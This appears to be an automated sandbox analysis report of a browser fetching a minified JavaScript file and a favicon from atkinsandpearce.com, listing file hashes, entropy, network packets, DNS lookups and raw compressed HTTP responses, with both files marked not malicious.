          Preview:...........ZyP.U..H[.....H.a.kh.j..l.&sZ.qZD..PQT(.d...w..!A@......x,..x.;<x,..._..9..m..fz....3...{.=...w..A..8:*..x.W.9..89Y..'*....e.~...MR.g...)..k..6E...0....$..........Q...uI....CY...S. .........=Q.....u0.z.....C....W-r@.)_T'n.a....C.W.-...'(.^..o.@..#..{.A....7.{..=.KHW....0F8..1/.sFBBBBb..'.CC.A.I...h...L..{*T...>.-..=.. ..Ox...nH..$..C...........Q}.h............/"G.e..o#..6Noy...sD..H.xv.^.....O9g.>..-.h?...T...9.70.D.../....^.... .]+r..BT'lEOU...A.!\.D.>e?.L)"W\.As9......v....F.C0..+q.N/...#...A.f..c7.!...N..8uk....d-._...U.G...Y._Zo..?I.7.....#.*W....e..j..q;.E.h.(.........|9..G..v.4..k..l"5...>~$$$$$l......A.I\..+.?.................0..`..Y..u...'I.....Y.0....7.$z.....Y..\.:.....'....x..h.Z1.$.....Q..p...{5.....IW.r....USY...%.....\F..K.r2..o..z..1..f-.6..j-..Q..G.......{......t...3.q...\Qk......3...1.V..r.?....64g..R....4....y'..h3..1.0b._Uq....Ke..eJf[.R5:.....%!^h5..N.n7.2..>y/s^..?.:.a.0t....0...5.........C.2.E}.6
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:gzip compressed data, from Unix, original size modulo 2^32 15406
          Category:dropped
          Size (bytes):1418
          Entropy (8bit):7.808280961928703
          Encrypted:false
          SSDEEP:24:XoUfrY8niiwgvR5bh1ml9YN9AzOipZSzQ7za2Qd2DDDSSApk1:XoUDdi8z11m9YcOgCWXx/1
          MD5:CFD5FAAC936F52F94D4B0549A01790F1
          SHA1:A4B603F97A1704D4FE6677D97347C1FD66AF0EF0
          SHA-256:E73B53ADEEB9CE4FC8158FAD84A7CC5011754C0A2C86C8CD84304C70BBBCF318
          SHA-512:736650808381AB42382BAD44007DA8E917861EB913904A802B2132B1F9C0724CD151A112792CD02A4828590243AD9B56718DF6AB90EF3221065E794E1CDBB119
          Malicious:false
          Reputation:low
          Preview:...........ZyP.U..H[.....H.a.kh.j..l.&sZ.qZD..PQT(.d...w..!A@......x,..x.;<x,..._..9..m..fz....3...{.=...w..A..8:*..x.W.9..89Y..'*....e.~...MR.g...)..k..6E...0....$..........Q...uI....CY...S. .........=Q.....u0.z.....C....W-r@.)_T'n.a....C.W.-...'(.^..o.@..#..{.A....7.{..=.KHW....0F8..1/.sFBBBBb..'.CC.A.I...h...L..{*T...>.-..=.. ..Ox...nH..$..C...........Q}.h............/"G.e..o#..6Noy...sD..H.xv.^.....O9g.>..-.h?...T...9.70.D.../....^.... .]+r..BT'lEOU...A.!\.D.>e?.L)"W\.As9......v....F.C0..+q.N/...#...A.f..c7.!...N..8uk....d-._...U.G...Y._Zo..?I.7.....#.*W....e..j..q;.E.h.(.........|9..G..v.4..k..l"5...>~$$$$$l......A.I\..+.?.................0..`..Y..u...'I.....Y.0....7.$z.....Y..\.:.....'....x..h.Z1.$.....Q..p...{5.....IW.r....USY...%.....\F..K.r2..o..z..1..f-.6..j-..Q..G.......{......t...3.q...\Qk......3...1.V..r.?....64g..R....4....y'..h3..1.0b._Uq....Ke..eJf[.R5:.....%!^h5..N.n7.2..>y/s^..?.:.a.0t....0...5.........C.2.E}.6
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:gzip compressed data, from Unix, original size modulo 2^32 10300
          Category:downloaded
          Size (bytes):5059
          Entropy (8bit):7.96156861116202
          Encrypted:false
          SSDEEP:96:CDGf0acejaMLHaZ6s/Dog+t6nWIa9556ZzAufE656oqaEtuaY:OFeeMDs6sUgf7aB6Zk4E4hEtuv
          MD5:0FA08ABCE79C092969858DAFF91A96D6
          SHA1:29D12A8AA280CA3BB71035B5E00526F237174E00
          SHA-256:8E9059AE7B95767B56714327E4E8182A53CAC05F39A84DDB5CF881CA8D3E366E
          SHA-512:8C453131D5AD544262A3FFDB9CAD1FCA9D56E9659BE522FBF0D8C08C84048F5FAE82DDB745A1AB47132806D4E752A2C3C41902144B70613AD212E37460B04CBE
          Malicious:false
          Reputation:low
          URL:http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js
          Preview:...........Zis....|.+..{-...$.6.(....D.......@H......o.H. ...Ja.f.m....%a.]3.=.*._.x.......l3.....az..\...x.._.8...o...........[...t...j..j..%..x;...+.O=....V8...._`9.$B...A.J..nl.x.?../....5..n..k?...;w....r)...B..v>./..).q..7.....Hv..u7....I$....ol.L.1."..5,......v.C..).GZSjO...........bJ1Rg..}..U`...]}..0{..t.....u.@S.O\Ju}}A.....HD.U..5.pf..Os........~..[w.=.....bC.<<...-E......p.q.+n...|.`.W..1.......o..t.E......s...p.....9.}A.gq.0;..?K.f..8G:L.p..UV.x.{.'.-.g]-<.v(..w\....#....[.~(.y.09..@:.{......{..(....d#.8`S.L...v/d#Ee..m..C.......j.F-.f..|.!.X$.-...Ga+&.z..z....z...w.7.<'..Yw.C.....?.b....%.....s.C"9>o[.K.e..+....t.-...{N@..V.M..7.A11...v..[BO.?#.......Dh.<.,o..6.;..Mh.....c.."....\8.R.....}......J.a...<3jwYh..bG.Ym....}O...t......"....j......D]s.[".zm45.B.^.&.BK.+S.[...V...q4P.....h?L..B.i...........T|..Z[0k....75..5.j..Ov..6...Ij..b}E............>q..fBj.q..qU.T..9..3.....hP....b.m.p[.Vs6....dj....W....v.)...]a.W+;S./.M..B...
          No static file info

          Download Network PCAP: filteredfull

          • Total Packets: 54
          • 443 (HTTPS)
          • 80 (HTTP)
          • 53 (DNS)
          TimestampSource PortDest PortSource IPDest IP
          Jul 15, 2024 18:18:53.326848984 CEST49675443192.168.2.4173.222.162.32
          Jul 15, 2024 18:19:02.935071945 CEST49675443192.168.2.4173.222.162.32
          Jul 15, 2024 18:19:03.471282959 CEST4973580192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:03.471534014 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:03.476792097 CEST8049735192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:03.476836920 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:03.476872921 CEST4973580192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:03.476908922 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:03.477123976 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:03.484298944 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003247023 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003305912 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003343105 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003390074 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.003892899 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003940105 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.003963947 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.047506094 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.091305971 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.097387075 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.220803976 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.220865011 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.220993996 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.256917000 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.263423920 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.263503075 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.263653994 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.268819094 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.794322014 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.794382095 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.794584036 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:04.932363033 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:04.984508038 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:05.624943018 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:05.624989986 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:05.625094891 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:05.625576973 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:05.625597954 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.266401052 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.266798019 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:06.266829967 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.268461943 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.268523932 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:06.467576027 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:06.467952013 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.512325048 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:06.512340069 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:06.568216085 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:07.162260056 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.162348986 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:07.162463903 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.164132118 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.164191008 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:07.838644028 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:07.838745117 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.842683077 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.842711926 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:07.843153000 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:07.887458086 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.889939070 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:07.932523012 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.111584902 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.111712933 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.111901045 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.111901045 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.111901045 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.166224957 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.166270018 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.166382074 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.166879892 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.166902065 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.419168949 CEST49742443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.419234991 CEST44349742184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.830796957 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.830993891 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.832283020 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.832309008 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.833034992 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:08.835262060 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:08.880533934 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:09.105038881 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:09.105169058 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:09.105465889 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:09.107902050 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:09.107937098 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:09.107961893 CEST49743443192.168.2.4184.28.90.27
          Jul 15, 2024 18:19:09.107970953 CEST44349743184.28.90.27192.168.2.4
          Jul 15, 2024 18:19:15.305972099 CEST49672443192.168.2.4173.222.162.32
          Jul 15, 2024 18:19:15.306061983 CEST44349672173.222.162.32192.168.2.4
          Jul 15, 2024 18:19:16.188827038 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:16.188983917 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:16.189050913 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:16.494698048 CEST49741443192.168.2.4172.217.18.4
          Jul 15, 2024 18:19:16.494740963 CEST44349741172.217.18.4192.168.2.4
          Jul 15, 2024 18:19:19.458204031 CEST5698853192.168.2.41.1.1.1
          Jul 15, 2024 18:19:19.463031054 CEST53569881.1.1.1192.168.2.4
          Jul 15, 2024 18:19:19.463095903 CEST5698853192.168.2.41.1.1.1
          Jul 15, 2024 18:19:19.463155985 CEST5698853192.168.2.41.1.1.1
          Jul 15, 2024 18:19:19.468291998 CEST53569881.1.1.1192.168.2.4
          Jul 15, 2024 18:19:19.917519093 CEST53569881.1.1.1192.168.2.4
          Jul 15, 2024 18:19:19.921832085 CEST5698853192.168.2.41.1.1.1
          Jul 15, 2024 18:19:19.927087069 CEST53569881.1.1.1192.168.2.4
          Jul 15, 2024 18:19:19.927139997 CEST5698853192.168.2.41.1.1.1
          Jul 15, 2024 18:19:24.909073114 CEST8049735192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:24.909167051 CEST4973580192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:25.157862902 CEST4973580192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:25.168009043 CEST8049735192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:49.232517958 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:49.237526894 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:49.935328007 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:19:49.940453053 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:19:57.419868946 CEST4972480192.168.2.42.19.126.137
          Jul 15, 2024 18:19:57.425692081 CEST80497242.19.126.137192.168.2.4
          Jul 15, 2024 18:19:57.425765991 CEST4972480192.168.2.42.19.126.137
          Jul 15, 2024 18:20:05.671308041 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:05.671356916 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:05.671439886 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:05.671685934 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:05.671705961 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:06.355062008 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:06.355353117 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:06.355402946 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:06.355911016 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:06.356256008 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:06.356365919 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:06.404402018 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:09.558623075 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:09.559128046 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:09.559290886 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:09.559547901 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:09.563662052 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:09.563693047 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:09.563749075 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:09.563750029 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:11.035873890 CEST4973880192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:11.035942078 CEST4973680192.168.2.4192.124.249.185
          Jul 15, 2024 18:20:11.041168928 CEST8049738192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:11.041488886 CEST8049736192.124.249.185192.168.2.4
          Jul 15, 2024 18:20:16.326164961 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:16.326231003 CEST44356992172.217.18.4192.168.2.4
          Jul 15, 2024 18:20:16.326390028 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:16.485009909 CEST56992443192.168.2.4172.217.18.4
          Jul 15, 2024 18:20:16.485053062 CEST44356992172.217.18.4192.168.2.4
          TimestampSource PortDest PortSource IPDest IP
          Jul 15, 2024 18:19:02.057928085 CEST53649221.1.1.1192.168.2.4
          Jul 15, 2024 18:19:02.100948095 CEST53579411.1.1.1192.168.2.4
          Jul 15, 2024 18:19:03.097280025 CEST53601141.1.1.1192.168.2.4
          Jul 15, 2024 18:19:03.438363075 CEST5380753192.168.2.41.1.1.1
          Jul 15, 2024 18:19:03.438510895 CEST5844053192.168.2.41.1.1.1
          Jul 15, 2024 18:19:03.456142902 CEST53538071.1.1.1192.168.2.4
          Jul 15, 2024 18:19:03.480565071 CEST53584401.1.1.1192.168.2.4
          Jul 15, 2024 18:19:04.232594013 CEST6547653192.168.2.41.1.1.1
          Jul 15, 2024 18:19:04.232994080 CEST5260253192.168.2.41.1.1.1
          Jul 15, 2024 18:19:04.253914118 CEST53654761.1.1.1192.168.2.4
          Jul 15, 2024 18:19:04.256413937 CEST53526021.1.1.1192.168.2.4
          Jul 15, 2024 18:19:05.616313934 CEST6460253192.168.2.41.1.1.1
          Jul 15, 2024 18:19:05.616686106 CEST5580653192.168.2.41.1.1.1
          Jul 15, 2024 18:19:05.623573065 CEST53646021.1.1.1192.168.2.4
          Jul 15, 2024 18:19:05.623624086 CEST53558061.1.1.1192.168.2.4
          Jul 15, 2024 18:19:09.025755882 CEST138138192.168.2.4192.168.2.255
          Jul 15, 2024 18:19:19.457849979 CEST53543431.1.1.1192.168.2.4
          Jul 15, 2024 18:19:19.991019011 CEST53525031.1.1.1192.168.2.4
          Jul 15, 2024 18:19:38.808967113 CEST53547791.1.1.1192.168.2.4
          Jul 15, 2024 18:20:01.310729980 CEST53619141.1.1.1192.168.2.4
          Jul 15, 2024 18:20:01.625098944 CEST53555781.1.1.1192.168.2.4
          TimestampSource IPDest IPChecksumCodeType
          Jul 15, 2024 18:19:03.480648994 CEST192.168.2.41.1.1.1c227(Port unreachable)Destination Unreachable
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jul 15, 2024 18:19:03.438363075 CEST192.168.2.41.1.1.10x56adStandard query (0)atkinsandpearce.comA (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:03.438510895 CEST192.168.2.41.1.1.10x3160Standard query (0)atkinsandpearce.com65IN (0x0001)false
          Jul 15, 2024 18:19:04.232594013 CEST192.168.2.41.1.1.10x659fStandard query (0)atkinsandpearce.comA (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:04.232994080 CEST192.168.2.41.1.1.10x8d0cStandard query (0)atkinsandpearce.com65IN (0x0001)false
          Jul 15, 2024 18:19:05.616313934 CEST192.168.2.41.1.1.10x5aa6Standard query (0)www.google.comA (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:05.616686106 CEST192.168.2.41.1.1.10x52a1Standard query (0)www.google.com65IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jul 15, 2024 18:19:03.456142902 CEST1.1.1.1192.168.2.40x56adNo error (0)atkinsandpearce.com192.124.249.185A (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:04.253914118 CEST1.1.1.1192.168.2.40x659fNo error (0)atkinsandpearce.com192.124.249.185A (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:05.623573065 CEST1.1.1.1192.168.2.40x5aa6No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
          Jul 15, 2024 18:19:05.623624086 CEST1.1.1.1192.168.2.40x52a1No error (0)www.google.com65IN (0x0001)false
          Jul 15, 2024 18:19:18.644422054 CEST1.1.1.1192.168.2.40x35a7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Jul 15, 2024 18:19:18.644422054 CEST1.1.1.1192.168.2.40x35a7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          • fs.microsoft.com
          • atkinsandpearce.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449736192.124.249.185804020C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          Jul 15, 2024 18:19:03.477123976 CEST476OUTGET /assets/js/main-f49476672004c4aclccf.min.js HTTP/1.1
          Host: atkinsandpearce.com
          Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Jul 15, 2024 18:19:04.003247023 CEST1236INHTTP/1.1 200 OK
          Server: Sucuri/Cloudproxy
          Date: Mon, 15 Jul 2024 16:19:03 GMT
          Content-Type: application/x-javascript
          Content-Length: 5059
          Connection: keep-alive
          X-Sucuri-ID: 14035
          X-XSS-Protection: 1; mode=block
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          Vary: Accept-Encoding
          Last-Modified: Tue, 16 Jan 2024 21:17:46 GMT
          ETag: "283c-60f16a9661280-gzip"
          Cache-Control: max-age=315360000
          Expires: Thu, 31 Dec 2037 23:55:55 GMT
          Content-Encoding: gzip
          Referrer-Policy: no-referrer-when-downgrade
          X-Cache-NxAccel: MISS
          Accept-Ranges: bytes
          X-Sucuri-Cache: MISS
          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 5a 69 73 da ca d2 fe 7c f2 2b 9c aa 7b 2d 14 f0 89 24 c0 36 e1 28 a7 cc 0e b6 44 d8 c4 16 df 94 a4 19 81 40 48 04 09 b3 c4 fe ef 6f f7 48 80 20 c9 b9 b7 de 4a 61 8d 66 e9 6d ba 9f ee 19 25 61 ad 5d 33 b0 3d f7 2a c1 5f fd 78 f7 07 b7 f6 e9 95 1f ac 6c 33 e0 f2 ef de fd 61 7a ae 1f 5c 11 fa 12 78 9e e3 5f c9 38 e7 0f db 6f 2e a9 fb e9 ca d2 1d 9f a6 a0 c3 5b d9 d4 0d 74 a4 f3 e9 6a ed 12 6a d9 2e 25 ef fe 78 3b 91 08 a6 2b ea 4f 3d 87 00 0d f1 56 38 0d d0 85 1d 94 5f 60 39 0c 24 42 ca a9 ab 18 41 fe 4a fe cc b8 6e 6c 97 78 9b 3f 89 ed 2f f5 c0 9c b2 35 09 97 6e ae 8a 6b 3f f0 16 e1 3b 77 10 d5 9c ea ee 84 72 29 b6 f4 0f 42 03 dd 76 3e 85 2f 91 fc 29 d6 8e 71 c2 f7 37 f8 f3 c6 f3 f9 48 76 9f 06 75 37 a0 ab 17 dd 49 24 8e 92 84 82 6f 6c 12 4c bb 31 b5 22 01 bd 35 2c e8 e3 e0 d5 cd a1 cf 76 dd 43 df e7 93 29 f2 47 5a 53 6a 4f a6 c1 ef 88 d5 d8 e8 05 b5 a8 f3 97 e4 62 4a 31 52 67 82 fe 7d c5 bd d0 55 60 9b ba c3 5d 7d ba e2 a6 30 7b ef c1 74 87 ed f8 1f b6 75 95 40 53 bc [TRUNCATED]
          Data Ascii: Zis|+{-$6(D@HoH Jafm%a]3=*_xl3az\x_8o.[tjj.%x;+O=V8_`9$BAJnlx?/5nk?;wr)Bv>/)q7Hvu7I$olL1"5,vC)GZSjObJ1Rg}U`]}0{tu@SO\Ju}}A.HDU5pfOs~[w=bC<<-Epq+n|`W1otEsp9}Agq0;?Kf8G:LpUVx{'-g]-<v(w\#[~(y09@:{{(d#8`SLv/d#EemCjF-f|!X$-Ga+&zzzw7<'YwC?b%
          Jul 15, 2024 18:19:04.003305912 CEST1236INData Raw: 89 73 a9 43 22 39 3e 6f 5b 09 4b 96 65 c2 1b 2b aa cf f3 cc 8c 74 cc 2d d7 fe 94 7b 4e 40 cb 9f da 56 00 4d 00 ac 37 13 41 31 31 e1 7f fc 76 c6 db 5b 42 4f 01 3f 23 9d c9 c0 fb 11 f9 f5 44 68 dc a2 3c e6 2c 6f b5 f8 36 a7 3b 2e c5 4d 68 d0 b5 17
          Data Ascii: sC"9>o[Ke+t-{N@VM7A11v[BO?#Dh<,o6;.Mhc"\8R}Ja<3jwYhbGYm}Ot"jD]s["zm45B^&BK+S[Vq4Ph?LBiT|Z[0k.755j
          Jul 15, 2024 18:19:04.003343105 CEST1236INData Raw: 6d 4a 12 de 90 04 26 bb 10 89 56 3a 54 1a 0b 16 14 3a ae b5 1c cf c3 7d 80 a8 2c 7a 8c 8f 01 fb 3d 4a 6f 01 1e 9c 00 91 16 04 9f 59 55 11 91 dc 83 36 cc 80 a2 67 32 b5 67 73 67 e1 7a cb ef 2b 3f 58 bf 6c b6 bb bd 20 4a e9 4c f6 f6 ee 3e 87 78 90
          Data Ascii: mJ&V:T:},z=JoYU6g2gsgz+?Xl JL>xV^*fWam~=y*>@7+#49iG:b#]hi)1sGRwJQjW*fvzN%'|o=Z[TjR
          Jul 15, 2024 18:19:04.003892899 CEST1236INData Raw: 60 78 d3 0c 47 4c 90 93 83 32 7b a7 ec eb 7b 35 bd 91 94 12 96 97 5c 92 3b ab 36 d3 56 69 08 d5 26 2b e6 b3 4d 28 c6 94 fd 5c 50 66 ed 7b 65 df db 87 4b 94 3d fc c3 71 ac 58 21 d5 c3 41 17 c9 96 ea 1b 65 3f 84 4a 16 0f 01 78 3a 0a 7f 21 77 e3 2e
          Data Ascii: `xGL2{{5\;6Vi&+M(\Pf{eK=qX!Ae?Jx:!w.2a'Q(u!NZ)+&,rH0b2^"'6u#$xAzSG^F- I0a'Ug`QD1A*s\/>8e"[!?'$O5><'8m5Fj9
          Jul 15, 2024 18:19:04.003940105 CEST711INData Raw: b8 66 78 f2 e6 f2 61 f2 8a aa 9e 13 39 a4 76 1f 39 f6 01 0f 19 e5 13 12 d2 83 3c 58 5d d9 1f 42 da 91 60 7c 1e 58 c8 e1 e1 14 e7 18 59 06 c7 07 c6 50 0a b9 66 68 7a 4b 36 02 4f 4f c0 bb 47 68 af 5d 4f 44 53 4e 85 8f 15 b3 5b 94 a6 19 ff 3d 18 0c
          Data Ascii: fxa9v9<X]B`|XYPfhzK6OOGh]ODSN[==;q6@z8hx\hZ#2dxa.cH:q0w<G|{{M&:C~s!+]uC|91Hy,36EfOK"5O
          Jul 15, 2024 18:19:04.091305971 CEST424OUTGET /favicon.ico HTTP/1.1
          Host: atkinsandpearce.com
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Referer: http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Jul 15, 2024 18:19:04.220803976 CEST1236INHTTP/1.1 200 OK
          Server: Sucuri/Cloudproxy
          Date: Mon, 15 Jul 2024 16:19:03 GMT
          Content-Type: image/x-icon
          Content-Length: 1418
          Connection: keep-alive
          X-Sucuri-ID: 14035
          X-XSS-Protection: 1; mode=block
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          Vary: Accept-Encoding
          Last-Modified: Tue, 16 Jan 2024 21:17:01 GMT
          ETag: "3c2e-60f16a6b76d40-gzip"
          Cache-Control: max-age=315360000
          Expires: Thu, 31 Dec 2037 23:55:55 GMT
          Content-Encoding: gzip
          Referrer-Policy: no-referrer-when-downgrade
          X-Cache-NxAccel: MISS
          Accept-Ranges: bytes
          X-Sucuri-Cache: MISS
